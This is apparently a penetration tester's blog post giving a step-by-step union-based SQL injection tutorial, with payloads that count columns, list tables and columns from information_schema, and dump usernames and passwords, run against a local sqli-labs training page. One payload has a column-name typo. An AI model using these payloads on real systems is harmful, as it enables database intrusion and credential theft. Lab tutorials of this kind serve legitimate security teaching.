congdong007

Penetration Test、Software Developer

0%

Union Sql Injection Detection Methods

Posted on Edited on In , , ,

Union Sql Injection Detection Methods

  1. First, check for the existence of an SQL injection vulnerability.
  2. Then, determine the injection type: character-based, numeric-based, or search-based.
  3. Use “order by” to further identify the number of columns:
    1
    2
    ?id=1' order by 3 --+ (normal)
    ?id=1' order by 4 --+ (error)
  4. Once the number of columns is determined using “order by,” proceed to replace the display position with some MySQL functions.
  5. Retrieve the tables in the current database:
    1
    ?id=-1' union select 1, group_concat('<br>', table_name), version() from information_schema.tables where table_schema=database()--+
  6. After obtaining the tables, retrieve the columns in those tables:
    1
    ?id=-1' union select 1, group_concat('<br>', column_name), version() from information_schema.columns where able_schema=database() and table_name='users'--+
  7. Retrieve the data:
    1
    ?id=-1' union select 1, group_concat('|', username), group_concat('|', password) from users--+
    These steps describe how an attacker can detect and exploit a SQL injection vulnerability to extract information from a database.

Example of Union Sql Injection Operation

1
2
3
4
5
6
7
8
9
http://127.0.0.1/sqli-labs-master/Less-1/?id=1'
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 --+ correct
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 4 --+ error
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,database(),version() --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat('<br>',table_name) ,version() from information_schema.tables where table_schema=database()--+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat('<br>',column_name),version() from information_schema.columns where table_schema=database() and table_name='users' --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, username,password from users --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat('|',username),group_concat('|',password) from users --+